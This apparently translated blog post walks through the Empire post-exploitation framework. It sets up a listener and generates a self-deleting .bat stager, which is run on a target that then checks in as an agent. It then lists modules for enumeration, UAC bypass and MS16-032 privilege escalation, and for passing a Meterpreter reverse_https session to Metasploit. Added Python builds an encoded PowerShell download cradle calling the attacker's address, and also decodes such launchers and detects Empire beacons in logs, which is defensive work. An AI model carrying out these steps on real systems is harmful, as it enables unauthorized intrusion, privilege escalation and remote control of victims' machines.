A First Look at Empire

Introduction: Empire's modules cover stager generation (the "trojans" that call back), information gathering, privilege escalation, lateral movement and persistence (backdoors).

Environment installation and setup

git clone https://github.com/EmpireProject/Empire.git
sudo ./Empire/setup/install.sh
./Empire/setup/reset.sh
install.sh checks that it is run as root, because it installs system packages and the Python dependencies; reset.sh resets the empire.db database (any saved listeners and agents are lost). Once installed, start Empire with ./empire from the Empire directory. The banner shows the number of loaded modules and the active listeners and agents:

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > 

Pressing Tab twice at the prompt lists the available commands:

(Empire) > 
agents        help          listeners     plugins       report        searchmodule  usemodule
creds         interact      load          preobfuscate  reset         set           usestager
exit          list          plugin        reload        resource      show      

Enter the listeners menu with `listeners` at the main prompt, then select the http listener with `uselistener http`:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > 
agents     creds      exit       info       listeners  resource   unset
back       execute    help       launcher   main       set    

Start it with `execute`. The http listener is served by Flask's built-in development server, so the warning it prints is expected:

(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

Back at the main menu (`main` or `back`), the banner now shows one active listener:

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > 

With the listener running, let's generate a stager (the "trojan").
Tab-completing `usestager` lists the available stager types:

(Empire) > usestager 
multi/bash                osx/macho                 windows/launcher_bat
multi/launcher            osx/macro                 windows/launcher_lnk
multi/macro               osx/pkg                   windows/launcher_sct
multi/pyinstaller         osx/safari_launcher       windows/launcher_vbs
multi/war                 osx/teensy                windows/launcher_xml
osx/applescript           windows/backdoorLnkMacro  windows/macro
osx/application           windows/bunny             windows/macroless_msword
osx/ducky                 windows/csharp_exe        windows/shellcode
osx/dylib                 windows/dll               windows/teensy
osx/jar                   windows/ducky             
osx/launcher              windows/hta       

Generate the stager: select windows/launcher_bat, point it at the http listener, and check the options with `info` before generating:

(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for
  Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to generate stager for.
  OutFile          False       /tmp/launcher.bat File to output .bat launcher to,
                                                 otherwise displayed on the screen.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  ObfuscateCommand False       Token\All\1,Launcher\STDIN++\12467
                                                 The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  Language         True        powershell        Language of the stager to generate.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Delete           False       True              Switch. Delete .bat after running.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_bat) > generate

[*] Stager output written out to: /tmp/launcher.bat
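What the launcher actually carries: Empire's BAT stager wraps a PowerShell one-liner in `powershell ... -enc <base64>`, and PowerShell's `-EncodedCommand` takes the base64 of the script's UTF-16LE bytes. The Python below is an added example written for this page, not Empire's own code: it builds a launcher line and a self-deleting .bat in that style (the flag set `-noP -sta -w 1 -enc` and the .bat template are assumptions modelled on what Empire 2.x emits, not copied from it), and decodes an encoded command back to plaintext, which is the first thing you do when one of these turns up in a log, a scheduled task or on disk. The embedded script and the 192.168.85.159 address are constructed placeholders, not Empire's real stager.

```python
import base64
import re
from typing import Optional

# Constructed placeholder standing in for the script Empire embeds; it is NOT Empire's stager.
SAMPLE_SCRIPT = (
    "$u='http://192.168.85.159/admin/get.php';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)


def encode_command(script: str) -> str:
    """PowerShell's -EncodedCommand expects base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_launcher_line(script: str) -> str:
    """One-liner in the style of Empire 2.x launchers (-noP -sta -w 1 -enc); flag set assumed, not copied."""
    return "powershell -noP -sta -w 1 -enc " + encode_command(script)


def build_bat(script: str) -> str:
    """Self-deleting .bat in the spirit of windows/launcher_bat (template is an assumption):
    run the launcher in the background, then delete this batch file (%~f0) and exit."""
    return (
        "@echo off\r\n"
        "start /b " + build_launcher_line(script) + "\r\n"
        'start /b "" cmd /c del "%~f0"&exit /b\r\n'
    )


# Matches -EncodedCommand / -enc / -ec / -e followed by a base64 blob, case-insensitively.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_launcher(line: str) -> Optional[str]:
    """Recover the plaintext script from a 'powershell -enc ...' line; None if nothing encoded is present."""
    m = ENC_RE.search(line)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate base64 whose padding was stripped
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    bat = build_bat(SAMPLE_SCRIPT)
    print(bat)
    for line in bat.splitlines():
        decoded = decode_launcher(line)
        if decoded:
            print("decoded:", decoded)
```

The decoder is the useful half for defenders: the base64 blob in an Empire launcher is not obfuscation, just transport encoding, and one line of Python turns it back into the download cradle with the listener's address in it.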

Copy /tmp/launcher.bat to the target (192.168.85.157 here) and run it.

On the attacker machine the stager is served and the agent checks in:

(Empire) > [*] Sending POWERSHELL stager (stage 1) to 192.168.85.157
[*] New agent 9PK2YXWA checked in
[+] Initial agent 9PK2YXWA from 192.168.85.157 now active (Slack)
[*] Sending agent (stage 2) to 9PK2YXWA at 192.168.85.157
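The same check-in seen from the wire: the stager and then the agent talk to the http listener with ordinary HTTP GET/POST requests to the listener's profile URIs, sent with the profile's User-Agent. In Empire 2.x the http listener's DefaultProfile is `/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`, and after staging the agent polls at its configured Delay (5 seconds for the agent shown later on this page). The Python below is an added example, not part of the original post or of Empire: it parses a handful of constructed web-log lines (the log format is invented for the example), flags requests that match both the default URI set and the default User-Agent, and groups repeated hits per source. Operators routinely change DefaultProfile, so a match is a lead to pivot on, not proof.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Set, Tuple

# DefaultProfile of the Empire 2.x http listener: "uri1,uri2,...|User-Agent".
EMPIRE_DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)


def parse_profile(profile: str) -> Tuple[Set[str], str]:
    """Split an Empire profile string into its URI set and its User-Agent."""
    uris, ua = profile.split("|", 1)
    return {u.strip() for u in uris.split(",") if u.strip()}, ua


DEFAULT_URIS, DEFAULT_UA = parse_profile(EMPIRE_DEFAULT_PROFILE)

# Constructed log format for this example: <timestamp> <src-ip> <method> <path> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from the original page); 192.168.85.157 is the
# target host from the check-in above, the other address is made up.
SAMPLE_LOG = """\
2019-12-30T02:38:40 192.168.85.157 GET /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/71.0"
2019-12-30T02:38:47 192.168.85.157 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-12-30T02:38:48 192.168.85.157 POST /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-12-30T02:38:52 192.168.85.157 GET /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-12-30T02:39:01 192.168.85.20 GET /news.php?id=3 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/71.0"
"""


def score_line(line: str) -> Optional[Dict]:
    """Score one log line: +1 for a profile URI (query string ignored), +1 for the profile User-Agent."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0]
    uri_match = path in DEFAULT_URIS
    ua_match = m["ua"] == DEFAULT_UA
    return {
        "ts": m["ts"], "src": m["src"], "path": path,
        "uri_match": uri_match, "ua_match": ua_match,
        "score": int(uri_match) + int(ua_match),
    }


def find_checkins(log: str, min_score: int = 2) -> List[Dict]:
    """Return the parsed lines whose score reaches min_score (2 = URI and UA both match)."""
    hits = []
    for line in log.splitlines():
        r = score_line(line)
        if r is not None and r["score"] >= min_score:
            hits.append(r)
    return hits


def beaconing_sources(hits: List[Dict], min_requests: int = 3) -> List[str]:
    """Sources with repeated profile hits: an Empire agent polls every Delay seconds, so it keeps coming back."""
    counts = Counter(h["src"] for h in hits)
    return sorted(src for src, n in counts.items() if n >= min_requests)


if __name__ == "__main__":
    hits = find_checkins(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["src"], h["path"])
    print("beaconing:", beaconing_sources(hits))
```

A URI hit on its own is weak (news.php is a plausible page name anywhere), which is why the default threshold requires the User-Agent as well; the repetition per source is the stronger signal, and it survives a changed profile as long as the Delay is short.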

List the agents and switch to the new one. In the table, `La` is the agent language (`ps` = PowerShell) and `Delay` is the check-in interval in seconds with its jitter (5/0.0 = every 5 seconds, no jitter). `interact` with no argument is rejected; pass the agent name:

(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 9PK2YXWA ps 192.168.85.157  WIN-RRI9T9SN85D   *WIN-RRI9T9SN85D\Admini powershell         3908   5/0.0    2019-12-30 02:38:47

(Empire: agents) > interact
[!] Please enter a valid agent name
(Empire: agents) > interact 9PK2YXWA
(Empire: 9PK2YXWA) > 

Now we are properly in the post-exploitation phase.

Gather useful information about the target host

  • usemodule situational_awareness/host/winenum
    Note: enumerates local users, domain group membership, last password set time, clipboard contents, basic system information, network adapters, shares and more.
  • usemodule situational_awareness/host/computerdetails
    Note: collects event log data, including RDP logon events, application control policy (AppLocker) logs, and records of PowerShell scripts that were run and saved; requires administrative privileges.

DNS information

  • usemodule situational_awareness/network/reverse_dns
    Note: set the Range parameter to the IP range you want to resolve.
  • usemodule situational_awareness/host/dnsserver
    Note: shows the IP address of the DNS server the host is currently using.

ARP scan

  • usemodule situational_awareness/network/arpscan
    Note: set the Range parameter, then `execute`.

Domain enumeration (PowerView)

  • usemodule situational_awareness/network/powerview/user_hunter
    Note: clearly shows which hosts domain admins have logged on to.
  • usemodule situational_awareness/network/powerview/get_domain_controller
    Note: finds the domain controllers.

bypassUAC

  • usemodule privesc/bypassuac
    Note: set the Listener parameter; on success a new, elevated agent checks in.
  • usemodule privesc/bypassuac_wscript
    Note: set Listener; only works on Windows 7.

Privilege escalation

  • usemodule privesc/ms16-032
    Note: Empire ships an MS16-032 exploit module; set Listener and a SYSTEM-level agent checks in on success.

Finding privilege-escalation vectors

  • usemodule privesc/powerup/allchecks
    Note: runs all of PowerUp's checks (service misconfigurations, unquoted service paths, writable service binaries, AlwaysInstallElevated, and so on) and reports the ones that apply.

Working with MSF (Metasploit)

The code_execution/invoke_shellcode module injects a Metasploit reverse_https payload into the agent's process, so Empire hands the session to a Metasploit handler. Start the handler first, then run the module; Lhost and Lport must match the handler (the original post mistakenly set Lport to an IP address):

empire:
(Empire: agents) > interact V92TNFDK
(Empire: V92TNFDK) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost 192.168.85.159
(Empire: code_execution/invoke_shellcode) > set Lport 4444
(Empire: code_execution/invoke_shellcode) > execute

metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.85.159
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

References:
https://www.cnblogs.com/dubh3/p/12046126.html
https://www.anquanke.com/post/id/87333#h2-1

Last modified: 2019-12-30 04:57 PM